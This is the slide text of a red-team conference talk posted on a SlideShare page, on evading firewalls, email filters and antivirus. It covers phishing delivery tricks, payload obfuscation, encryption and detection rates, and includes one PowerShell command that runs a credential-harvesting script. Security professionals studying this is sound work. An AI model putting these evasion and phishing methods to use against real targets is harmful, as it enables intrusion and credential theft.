Se ha denunciado esta presentación.
Se está descargando tu SlideShare. ×

Modern Evasion Techniques

Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Anuncio
Anuncio

Eche un vistazo a continuación

1 de 58 Anuncio

Más Contenido Relacionado

Presentaciones para usted (20)

Similares a Modern Evasion Techniques (20)

Anuncio

Más reciente (20)

Modern Evasion Techniques

  1. 1. Modern Evasion Techniques a.k.a - How to Concatenate Strings Jason Lang - @curi0usJack
  2. 2. PowerShell, Macros, CSharp Proofpoint, Mimecast Palo Alto, Fortinet. Cisco. Most of them. Anti-Virus Evasion Payload Customization Inline Control Workarounds NG Email Controls 4 3 1 2 Topics
  3. 3. Thank you: @Bandrel @jarsnah12 @slobtresix0 @midnite_runr msf/empire devs
  4. 4. About • 10+ years full time InfoSec • Sr Consultant @ TrustedSec • Specialties: Active Directory, Development (C# Python PowerShell) • Hobbies: Woodworking, Beekeeping, Fly Fishing Jason Lang @curi0usJack
  5. 5. PAUSE
  6. 6. blue harder
  7. 7. Inline Controls • Defined: A network layer control that performs real- time threat prevention • Two biggest contenders: Palo Alto, Fortinet. • My testing was performed with a fully licensed, up-to- date Palo Alto, as well as a Cisco 5500 with FirePower
  8. 8. Meterpreter (stock) Test Cases Empire Pupy Custom Meterpreter •windows/x64/meterpreter/reverse_https •Default certificate •Port 443 •Empire 2.1 •Default Certificate •Standard stager •Port 443 •obfs3 transport •Defaults •Port 443 •Custom C# code •Whatever I wanted Victim Machines: Windows 7/10 x64. Windows Defender
  9. 9. Cisco Configuration 9 • Rules: Blocking all the things • SSL Decryption: ON
  10. 10. Cisco Configuration 10 https://www.cisco.com/c/en/us/td/docs/security/firepower/60/configuration/guide/ fpmc-config-guide-v60/Access_Control_Using_Intrusion_and_File_Policies.html
  11. 11. Cisco Configuration 11 MAX DETECTION MODE:
  12. 12. PA Configuration 12 • Vuln Protection: All the things set to reset_both • Wildfire: ON • SSL Decryption
  13. 13. Meterpreter Results 13 • With SSL Decryption • Session Opened/Closed • Without SSL Decryption Results were the same for the Custom C# Meterpreter.
  14. 14. Pupy Results 14 • With SSL Decryption • Without SSL Decryption Win10 Defender ^^
  15. 15. Empire Lulz A story in screenshots
  16. 16. Empire Lulz After running our launcher…
  17. 17. Empire Lulz
  18. 18. Empire Lulz Nah… this shouldn’t work…there’s no way… A minor server change:
  19. 19. Empire Lulz
  20. 20. Inline Evasions • If you must use msf, use auxiliary/gather/ impersonate_ssl
  21. 21. Inline Evasions
  22. 22. Inline Evasions
  23. 23. Inline Evasions • Pay attention to Decryption/Detection patterns. • Favor Empire/Pupy over MSF if you are getting detected. Change all defaults. • Change your template**. • Hope you’re working with a Cisco firewall. ** https://www.blackhillsinfosec.com/modifying-metasploit-x64-template-for-av-evasion/
  24. 24. Email Controls • Defined: Anything that stops my phish from getting to the inbox • Examples: Proofpoint, Mimecast, Google spam filters
  25. 25. Email Controls Thanks to @CaseyCammilleri for all the shells!
  26. 26. Email Controls
  27. 27. Email Controls
  28. 28. Email Controls
  29. 29. Email Controls Apache mod_rewrite to the rescue!
  30. 30. Email Controls Add to /etc/apache2/sites-enabled/000-default.conf
  31. 31. Email Controls Create /var/www/html/.htaccess Moar awesome redteam infrastructure guidance here: https://bluescreenofjeff.com/
  32. 32. Email Controls
  33. 33. Email Controls Thanks for the tip @slobtresix0!
  34. 34. Email Controls
  35. 35. haha AV https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10
  36. 36. Email Controls ^ Shell from JOHNNYSPC (Wildfire) ^
  37. 37. Email Controls
  38. 38. Email Controls
  39. 39. Email Controls
  40. 40. Email Controls
  41. 41. Email Controls
  42. 42. Email Controls
  43. 43. Email Controls Q: What if Google is blocking on the recipient’s side?
  44. 44. Email Controls A: You forgot this. ^^ Correct SPF Record for sending via O365 ^^
  45. 45. Email Workarounds 1. Obfuscate your payload (generally the most basic will do) 2. Set SPF/DKIM Records 3. Use links instead of attachments 4. mod_rewrite is your friend 5. Check the phish with isnotspam.com 6. Don’t trip threshold alerts. Send targeted phish slowly
  46. 46. Anti-Virus
  47. 47. Anti-Virus • First things first thing’s first: Understand current state • Test payloads against Virus Total • Focused on the major players: Symantec, McAfee, Trend, Windows Defender, Cylance
  48. 48. Anti-Virus Type Template Args/Notes Detections Major Player Binary (x86) No None 51/64 Yes Binary (x64) No None 41/64 Yes Binary (x64) Yes None 16/62 Yes Binary (x64) Yes Custom C# 6/64 Yes (MS) Binary (x64) Yes C#, -e xor -i 4 3/64 Yes (MS) Binary (x64) Yes C#, -e zutto_dekiru 2/64 No PowerShell No Unicorn 1/56 No Binary (x64) Yes Ebowla 0/64 No
  49. 49. AV Evasion #1 - Custom C# 1 49 • Receives msfvenom -f csharp output • Easily modified to suit needs • Basic exe detection: 6/64
  50. 50. AV Evasion #1 - Custom C# 2 50 • Runs powershell code without powershell.exe
  51. 51. Demo: C# Payload Generation
  52. 52. AV Evasion #1 - Custom C# 2
  53. 53. • AV Vendors are simply searching for strings • Remove all comments • Change function names / param names • Concatenate your encoded commands AV Evasion #2 - PowerShell
  54. 54. AV Evasion #2 - PowerShell powershell -W 1 -c “. .Invoke-Minicars.ps1; Invoke-Minicars -GimmeCreds” https://gist.github.com/curi0usJack/adbf34bd402f28138388bd6e266da961
  55. 55. AV Evasion #3 - Ebowla 55 • Encrypts payload with target env variable • Self decrypts on execution • Basic exe detection: 0/64 • https://github.com/Genetic- Malware/Ebowla
  56. 56. Demo: Chaining it together Payload Gen -> Evasion -> Delivery Vehicle
  57. 57. Tools 1. MSF/Empire - You should know where these are at. =) 2. Pupy - https://github.com/n1nj4sec/pupy 3. Unicorn - https://github.com/trustedsec/unicorn 4. Ebowla - https://github.com/Genetic-Malware/Ebowla 5. Luckystrike - https://github.com/curi0usJack/luckystrike 6. C# Demo Extras 1. https://github.com/curi0usJack/psfire 2. https://github.com/curi0usJack/custompayload
  58. 58. Thank you! =)

×